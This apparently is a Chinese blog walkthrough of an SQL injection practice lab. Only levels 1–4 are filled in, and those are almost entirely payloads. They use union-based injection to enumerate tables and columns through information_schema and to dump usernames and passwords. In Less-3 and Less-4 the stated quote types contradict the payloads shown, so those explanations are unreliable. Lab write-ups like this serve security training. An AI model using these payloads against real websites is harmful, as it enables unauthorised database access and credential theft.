sql注入靶场1-10关

Less-1

提示你输入数字值的ID作为参数,我们输入?id=1

接下来判断是字符型还是数字型

输入?id=1'     //报错

输入?id=1' --+     //(--+为注释符)正常回显

我们判断出是字符型

用order by语句来查看有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。一步一步测试

?id=1'order by 3 --+

将3换成4后就报错,说明数据有3列

?id=1'order by 4 --+

爆出显示位:

?id=-1'union select 1,2,3--+

然后获取当前数据名和版本号

?id=-1'union select 1,database(),version()--+

爆表

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名:

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询到账号密码在这个表中,现在要得到该字段内容

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

Less-2

思路和第一关一样,先判断为什么类型

输入?id=1‘ --+     //报错

输入?id=1 --+     //正常回显

说明是数字型注入

用order by语句来查看有几列

?id=1 order by 3--+

显示位:

?id=-1 union select 1,2,3--+

然后获取当前数据名和版本号

?id=-1 union select 1,database(),version()--+

爆表:

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询到账号密码在这个表中,现在要得到该字段内容

?id=-1 union select 1,2,group_concat(username ,id , password) from users--+

Less-3

输入?id=1'出现回显如下,根据报错信息我们可以推断单引号字符型且有括号,所以需要闭合单引号且也要考虑括号

用order by语句来查看有几列:

?id=1") order by 3--+

显示位:

?id=-1") union select 1,2,3--+

然后获取当前数据名和版本号:

?id=-1") union select 1,database(),version()--+

爆表:

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名:

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

得到该字段内容:

?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

Less-4

输入?id=1根据页面报错信息得知sql语句是双引号字符型且有括号

用order by语句来查看有几列:

?id=1') order by 3--+

显示位:

?id=-1') union select 1,2,3--+

然后获取当前数据名和版本号:

?id=-1') union select 1,database(),version()--+

爆表:

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名:

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

得到该字段内容:

?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

Less-5

Less-6

Less-7

Less-8

Less-9

Less-10

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值